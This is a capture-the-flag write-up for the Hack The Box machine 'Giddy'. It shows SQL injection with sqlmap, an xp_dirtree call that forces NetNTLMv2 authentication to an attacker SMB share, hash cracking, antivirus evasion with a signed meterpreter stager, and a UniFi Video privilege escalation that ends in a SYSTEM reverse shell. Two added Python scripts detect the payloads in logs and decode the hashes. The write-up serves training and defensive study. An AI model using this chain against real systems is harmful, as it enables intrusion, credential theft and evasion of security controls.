Giddy

16/02/2019

This is a very interesting box which requires an SMBRelay attack through an MSSQL connection to obtain a user shell, and to escalate privileges we will need to do some AV bypassing to make our exploit work.

User Privilege Escalation

User

First, run nmap with version detection and the default scripts; it shows ports 80, 443 and 3389 are open.

root@kali:~/htb/giddy# nmap -sC -sV 10.10.10.104
Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-04 10:08 UTC
Nmap scan report for 10.10.10.104
Host is up (0.079s latency).
Not shown: 997 filtered ports
PORT     STATE SERVICE       VERSION
80/tcp   open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
443/tcp  open  ssl/http      Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
| ssl-cert: Subject: commonName=PowerShellWebAccessTestWebSite
| Not valid before: 2018-06-16T21:28:55
|_Not valid after:  2018-09-14T21:28:55
|_ssl-date: 2019-02-04T10:08:33+00:00; 0s from scanner time.
| tls-alpn: 
|   h2
|_  http/1.1
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=Giddy
| Not valid before: 2019-02-03T04:29:07
|_Not valid after:  2019-08-05T04:29:07
|_ssl-date: 2019-02-04T10:08:33+00:00; 0s from scanner time.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 33.44 seconds

On the default page of the IIS server we get the following picture on both HTTP and HTTPS.

We are going to run gobuster with SecLists' raft-small-directories.txt wordlist to try to find something on the web server.

root@kali:~/htb/giddy# /opt/gobuster/gobuster -w /usr/share/wordlists/SecLists/Discovery/Web-Content/raft-small-directories.txt -u http://10.10.10.104/

=====================================================
Gobuster v2.0.1              OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://10.10.10.104/
[+] Threads      : 10
[+] Wordlist     : /usr/share/wordlists/SecLists/Discovery/Web-Content/raft-small-directories.txt
[+] Status codes : 200,204,301,302,307,403
[+] Timeout      : 10s
=====================================================
2019/02/05 09:25:55 Starting gobuster
=====================================================
/aspnet_client (Status: 301)
/remote (Status: 302)
/Aspnet_client (Status: 301)
/mvc (Status: 301)
/aspnet_Client (Status: 301)
/Remote (Status: 302)
=====================================================
2019/02/05 09:29:20 Finished
=====================================================

We have a PowerShell login panel on /remote.

And some kind of inventory in /mvc.

When clicking on any of those items we get redirected to a more detailed view of the product.

The URL has the following structure: http://10.10.10.104/mvc/Product.aspx?ProductSubCategoryId=18. If we change that ID and append special characters, like 18', we get the following SQL error.

This might mean we can exploit an SQLi in that parameter, so let's use sqlmap to find out.

root@kali:~/htb/giddy# sqlmap -u http://10.10.10.104/mvc/Product.aspx?ProductSubCategoryId=18
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.2.12#stable}
|_ -| . ["]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org
...
sqlmap identified the following injection point(s) with a total of 76 HTTP(s) requests:
---
Parameter: ProductSubCategoryId (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: ProductSubCategoryId=18 AND 8664=8664

    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)
    Payload: ProductSubCategoryId=18 AND 4450 IN (SELECT (CHAR(113)+CHAR(107)+CHAR(122)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (4450=4450) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(120)+CHAR(118)+CHAR(120)+CHAR(113)))

    Type: inline query
    Title: Microsoft SQL Server/Sybase inline queries
    Payload: ProductSubCategoryId=(SELECT CHAR(113)+CHAR(107)+CHAR(122)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (7751=7751) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(120)+CHAR(118)+CHAR(120)+CHAR(113))

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: ProductSubCategoryId=18;WAITFOR DELAY '0:0:5'--

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind (IF)
    Payload: ProductSubCategoryId=18 WAITFOR DELAY '0:0:5'
---
[09:41:09] [INFO] testing Microsoft SQL Server
[09:41:09] [INFO] confirming Microsoft SQL Server
[09:41:10] [INFO] the back-end DBMS is Microsoft SQL Server
...

The page is vulnerable and is running MSSQL as its DBMS.

We can dump the database contents, but this takes a really long time and I didn't find anything interesting, because those credit card numbers are unfortunately fake.

root@kali:~/htb/giddy# sqlmap -u http://10.10.10.104/mvc/Product.aspx?ProductSubCategoryId=18 --dump
...
+--------------+---------+----------+---------------+----------------+------------------------+
| CreditCardID | ExpYear | ExpMonth | CardType      | CardNumber     | ModifiedDate           |
+--------------+---------+----------+---------------+----------------+------------------------+
| 11935        | 2006    | 11       | SuperiorCard  | 11111000471254 | Aug 30 2007 12:00AM    |
| 12094        | 2005    | 8        | Distinguish   | 11111002034157 | Jan  6 2008 12:00AM    |
| 10246        | 2005    | 7        | ColonialVoice | 11111005230447 | Feb 15 2008 12:00AM    |
| 3009         | 2006    | 7        | ColonialVoice | 11111007955171 | Jun 21 2007 12:00AM    |
...

Now that we have control of the database, what we're going to do is make the Giddy machine connect back to us over SMB so we can capture the user's NetNTLMv2 hash.

First of all, start Impacket's smbserver.py to set up an SMB share on our machine.

root@kali:~/htb/giddy# /opt/impacket/examples/smbserver.py caca /pipi
Impacket v0.9.17 - Copyright 2002-2018 Core Security Technologies

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed

Then use sqlmap again to open a sql-shell on Giddy.

root@kali:~/htb/giddy# sqlmap -u http://10.10.10.104/mvc/Product.aspx?ProductSubCategoryId=18 --sql-shell
...
sql-shell> 

Once inside, we can run the following command, which makes the SQL server reach out to the SMB share we have just created on our machine.

sql-shell> EXEC master..xp_dirtree '\\10.10.16.35\caca'

If we check the smbserver output we can see the NetNTLMv2 hash of the user GIDDY\Stacy.

[*] Incoming connection (10.10.10.104,49781)
[*] AUTHENTICATE_MESSAGE (GIDDY\Stacy,GIDDY)
[*] User Stacy\GIDDY authenticated successfully
[*] Stacy::GIDDY:4141414141414141:4edf58c83b130168f90c5b9326c31244:010100000000000000babd486fbdd40101fc3192d02de35000000000010010006f0071006e00580068006c0066006300020010004800520057005100430070006c005700030010006f0071006e00580068006c0066006300040010004800520057005100430070006c0057000700080000babd486fbdd401060004000200000008003000300000000000000000000000003000002ec7b345bd46499b56b5c2fc37f09f668bc815d35dd07b3f192688f111c10a0a0a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310036002e0033003500000000000000000000000000
[*] AUTHENTICATE_MESSAGE (GIDDY\Stacy,GIDDY)
[*] User Stacy\GIDDY authenticated successfully
[*] Stacy::GIDDY:4141414141414141:265ce91e9fc10b1288af1330b4dfa784:010100000000000000babd486fbdd40114ba6b9df9d51e1800000000010010006f0071006e00580068006c0066006300020010004800520057005100430070006c005700030010006f0071006e00580068006c0066006300040010004800520057005100430070006c0057000700080000babd486fbdd401060004000200000008003000300000000000000000000000003000002ec7b345bd46499b56b5c2fc37f09f668bc815d35dd07b3f192688f111c10a0a0a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310036002e0033003500000000000000000000000000
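Every probe sqlmap sent and the xp_dirtree call itself travelled inside the ProductSubCategoryId parameter, so on the server side they all land in the IIS log's cs-uri-query field. As an added example that is not part of the writeup, the following script scans W3C-format IIS log lines (a constructed sample; 10.10.14.7 is a made-up benign client) for the payload shapes shown above and groups the hits by source address.

```python
"""Flag IIS W3C log lines whose query string carries the injection patterns used above."""
import re
from urllib.parse import unquote_plus

# Signatures drawn from this writeup: sqlmap's probe payloads and the xp_dirtree UNC call.
SIGNATURES = {
    "boolean_blind": re.compile(r"\bAND\s+\d+\s*=\s*\d+", re.I),
    "char_concat_error": re.compile(r"(?:CHAR\(\d+\)\+){3,}", re.I),
    "stacked_query_delay": re.compile(r";\s*WAITFOR\s+DELAY", re.I),
    "time_based_blind": re.compile(r"\bWAITFOR\s+DELAY\b", re.I),
    "xp_procedure": re.compile(r"\bxp_\w+", re.I),
    "unc_path": re.compile(r"\\\\\d{1,3}(?:\.\d{1,3}){3}\\"),
}

# Constructed sample log (not from the box): one benign hit from a made-up client 10.10.14.7,
# then three requests shaped like the probes and the xp_dirtree call shown in the writeup.
SAMPLE_LOG = """#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
2019-02-05 09:30:01 10.10.10.104 GET /mvc/Product.aspx ProductSubCategoryId=18 80 - 10.10.14.7 Mozilla/5.0 200
2019-02-05 09:41:05 10.10.10.104 GET /mvc/Product.aspx ProductSubCategoryId=18%20AND%208664%3D8664 80 - 10.10.16.35 sqlmap/1.2.12 200
2019-02-05 09:41:09 10.10.10.104 GET /mvc/Product.aspx ProductSubCategoryId=18%3BWAITFOR%20DELAY%20%270%3A0%3A5%27-- 80 - 10.10.16.35 sqlmap/1.2.12 200
2019-02-05 09:55:12 10.10.10.104 GET /mvc/Product.aspx ProductSubCategoryId=18%3BEXEC%20master..xp_dirtree%20%27%5C%5C10.10.16.35%5Ccaca%27-- 80 - 10.10.16.35 sqlmap/1.2.12 200
"""

def analyze_line(line):
    """Return (client_ip, request, matched signature names) for one log line, None for comments."""
    if line.startswith("#") or not line.strip():
        return None
    fields = line.split()
    # Field order assumed to follow the #Fields header above; adjust the indexes for other layouts.
    _, _, _, method, stem, query, _, _, client_ip = fields[:9]
    decoded = unquote_plus(query)  # IIS logs the query string still URL-encoded
    hits = [name for name, rx in SIGNATURES.items() if rx.search(decoded)]
    return client_ip, f"{method} {stem}", hits

def suspicious_requests(log_text):
    """Group flagged requests by client IP so a probing burst from one source stands out."""
    by_ip = {}
    for line in log_text.splitlines():
        parsed = analyze_line(line)
        if parsed and parsed[2]:
            by_ip.setdefault(parsed[0], []).append(parsed[2])
    return by_ip

if __name__ == "__main__":
    for ip, hits in suspicious_requests(SAMPLE_LOG).items():
        print(ip, hits)
```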

We can use hashcat (mode 5600, NetNTLMv2) with rockyou to crack the captured hash and recover the password xNnWo6272k7x.

root@kali:~/htb/giddy# hashcat -m 5600 ntlm /usr/share/wordlists/rockyou.txt --force
...
STACY::GIDDY:4141414141414141:8fb6db9998908fed4f1de19c791dd4ae:010100000000000080e1c72540bdd4013ed303d26c5b0876000000000100100076005a006500680071006f0072005700020010004c007500440063004c005700740044000300100076005a006500680071006f0072005700040010004c007500440063004c005700740044000700080080e1c72540bdd4010600040002000000080030003000000000000000000000000030000017ff5a3fd3da3c7bdf30a3e6cc9bd6afc10bcacf578d4f1debf2d2cf690905850a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310036002e0033003500000000000000000000000000:xNnWo6272k7x
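The line hashcat consumed is more than a hash: the long blob after the NTProofStr is the client's NTLMv2 response, which carries the client's clock and the target name it authenticated to (here cifs/10.10.16.35, i.e. the capture server), so a defender reviewing such captures or SMB authentication traces can see who connected where and when. As an added example that is not part of the writeup, this decoder takes the first line smbserver printed above (split here along its structure) and walks its AV_PAIR list; the SingleHost and ChannelBindings values are left as hex.

```python
"""Decode a captured NetNTLMv2 line (hashcat -m 5600 format) into the fields it carries."""
import struct
from datetime import datetime, timedelta, timezone

# The first line smbserver printed above for GIDDY\Stacy, split here along its structure.
SAMPLE_5600 = (
    "Stacy::GIDDY:4141414141414141:4edf58c83b130168f90c5b9326c31244:"
    + "0101" + "00" * 6 + "00babd486fbdd401" + "01fc3192d02de350" + "00" * 4  # blob header
    + "01001000" + "6f0071006e00580068006c0066006300"  # MsvAvNbComputerName
    + "02001000" + "4800520057005100430070006c005700"  # MsvAvNbDomainName
    + "03001000" + "6f0071006e00580068006c0066006300"  # MsvAvDnsComputerName
    + "04001000" + "4800520057005100430070006c005700"  # MsvAvDnsDomainName
    + "07000800" + "00babd486fbdd401" + "06000400" + "02000000"  # MsvAvTimestamp, MsvAvFlags
    + "08003000" + "30000000" + "00" * 4 + "0000000000300000"  # MsvAvSingleHost
    + "2ec7b345bd46499b56b5c2fc37f09f668bc815d35dd07b3f192688f111c10a0a"
    + "0a001000" + "00" * 16  # MsvAvChannelBindings
    + "09002000" + "63006900660073002f00310030002e00310030002e00310036002e00330035"  # MsvAvTargetName
    + "00" * 8)  # MsvAvEOL plus padding
AV_NAMES = {1: "NbComputerName", 2: "NbDomainName", 3: "DnsComputerName", 4: "DnsDomainName",
            5: "DnsTreeName", 6: "Flags", 7: "Timestamp", 8: "SingleHost", 9: "TargetName",
            10: "ChannelBindings"}
UTF16_IDS = {1, 2, 3, 4, 5, 9}  # AV_PAIR values stored as UTF-16LE strings

def filetime_to_datetime(ft):
    """Windows FILETIME: 100 ns ticks since 1601-01-01 UTC."""
    return datetime(1601, 1, 1, tzinfo=timezone.utc) + timedelta(microseconds=ft // 10)

def parse_5600(line):
    """Split USER::DOMAIN:SERVERCHALLENGE:NTPROOFSTR:BLOB[:password] and walk the AV_PAIRs."""
    user, _, domain, server_chal, nt_proof, rest = line.split(":", 5)
    blob = bytes.fromhex(rest.split(":")[0])  # drop hashcat's ":password" suffix if present
    # NTLMv2_CLIENT_CHALLENGE: RespType, HiRespType, 6 reserved, FILETIME, client challenge, 4 reserved
    _, _, ft, client_chal = struct.unpack_from("<BB6xQ8s4x", blob, 0)
    info = {"user": user, "domain": domain, "server_challenge": server_chal,
            "nt_proof_str": nt_proof, "timestamp": filetime_to_datetime(ft),
            "client_challenge": client_chal.hex(), "av_pairs": {}}
    off = 28
    while off + 4 <= len(blob):
        av_id, av_len = struct.unpack_from("<HH", blob, off)
        value = blob[off + 4:off + 4 + av_len]
        off += 4 + av_len
        if av_id == 0:  # MsvAvEOL: anything after it is padding
            break
        name = AV_NAMES.get(av_id, f"Unknown({av_id})")
        info["av_pairs"][name] = value.decode("utf-16-le") if av_id in UTF16_IDS else value.hex()
    return info
```

The NetBIOS and DNS names are the random ones Impacket's server advertised in its challenge, echoed back by the client.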

With those credentials, we can now log in to the panel we saw before on https://10.10.10.104/remote/.

Inside, we have a PowerShell console we can use to execute commands.

Under Stacy's Desktop we have the user flag.

PS C:\Users\Stacy\Desktop> type user.txt
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

Privilege Escalation

After some enumeration we see what could be an interesting program installed on the machine, UniFi Video.

PS C:\Users\Stacy\Documents> dir

    Directory: C:\Users\Stacy\Documents

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        6/17/2018   9:36 AM              6 unifivideo

And of course, there are some exploits for that program.

root@kali:~/htb/giddy# searchsploit unifi video
------------------------------------------------ ----------------------------------------
 Exploit Title                                  |  Path
                                                | (/usr/share/exploitdb/)
------------------------------------------------ ----------------------------------------
Ubiquiti Networks UniFi Video Default - 'crossd | exploits/php/webapps/39268.java
Ubiquiti UniFi Video 3.7.3 - Local Privilege Es | exploits/windows/local/43390.txt
------------------------------------------------ ----------------------------------------
Shellcodes: No Result

We're going to try the Ubiquiti UniFi Video 3.7.3 - Local Privilege Escalation exploit to escalate privileges.

As the txt explains, the vulnerability is that on service start and stop, UniFi Video tries to load and execute the file at C:\ProgramData\unifi-video\taskkill.exe, and by copying an arbitrary exe there it is possible to execute it as NT AUTHORITY\SYSTEM.

What we're going to do is create a malicious exe that opens a reverse shell to our local machine. To start, check the system architecture.

PS C:\ProgramData\unifi-video> $ENV:PROCESSOR_ARCHITECTURE
AMD64

The problem here is that the antivirus blocks and removes our executables, so we will have to bypass it.

PS C:\ProgramData\unifi-video> Get-FileHash taskkill.exe
Get-FileHash : The file 'C:\ProgramData\unifi-video\taskkill.exe' cannot be read: Operation did not complete 
successfully because the file contains a virus or potentially unwanted software.

    + CategoryInfo          : ReadError: (C:\ProgramData\unifi-video\taskkill.exe:PSObject) [Write-Error], WriteErrorException
    + FullyQualifiedErrorId : FileReadError,Get-FileHash

To accomplish the bypass I used Phantom-Evasion to create a meterpreter stager with all the default options, which spawn multiple decoy processes, strip the binary and sign the executable to make detection harder.

[1] Windows modules -> [2] Stager -> [2] X64 stagers -> [1] C x64/meterpreter/reverse_TCP VirtualAlloc 

====

[>] Please insert LHOST: 10.10.16.35

[>] Please insert LPORT: 6969

[>] Please insert output filename: taskkill

[>] Spawn Multiple Processes:

During target-side execution this will cause to spawn a maximum of 4 processes
consequentialy.

Only the last spawned process will reach the malicious section of code
while the other decoy processes spawned before will executes only random junk code

[>] Add multiple processes behaviour?(y/n): y

[>] Insert number of decoy processes (integer between 1-3): 2

[>] Generating C meterpreter stager


[>] Compiling...


[>] Strip 

strip is a GNU utility to "strip" symbols from object files.

This is useful for minimizing their file size, streamlining them for distribution.

It can also be useful for making it more difficult to reverse-engineer the compiled code.

(Lower rate of detection)


[>] Strip executable? (y/n):y

[>] Stripping...


[>] Sign Executable 

Online Certificate spoofer & Executabe signer (Lower rate of detection)


[>] Sign executable? (y/n):y

[>] Insert certificate spoofing target (default: www.microsoft.com:443): 

[>] Insert sign software description (default: Notepad Benchmark Util): 

[>] Signing taskkill.exe with osslsigncode...

[>] Succeeded


[<>] File saved in Phantom-Evasion folder

To listen for the meterpreter session, use the msfconsole exploit/multi/handler module with windows/x64/meterpreter/reverse_tcp as the payload, specifying our IP and the port selected before.

msf5 exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.10.16.35      yes       The listen address (an interface may be specified)
   LPORT     6969             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.16.35:6969 

Now, as the description of the exploit says, we have to put our exe at C:\ProgramData\unifi-video\taskkill.exe.

PS C:\Users\Stacy\Documents> cd C:\ProgramData\unifi-video
PS C:\ProgramData\unifi-video> wget http://10.10.16.35/taskkill.exe -UseBasicParsing -OutFile taskkill.exe

Restart the service and the exe should be executed automatically.

PS C:\ProgramData\unifi-video> Restart-Service -Name "Ubiquiti UniFi Video"

In msfconsole we should see that a meterpreter session from Giddy has been opened as nt authority\system.

[*] Sending stage (206403 bytes) to 10.10.10.104
[*] Meterpreter session 4 opened (10.10.16.35:6969 -> 10.10.10.104:49909) at 2019-02-05 15:46:11 +0000

meterpreter > shell
Process 1708 created.
Channel 1 created.
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\ProgramData\unifi-video>whoami
whoami
nt authority\system

The root flag is on the Administrator's desktop.

C:\Users\Administrator\Desktop>type root.txt
type root.txt
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX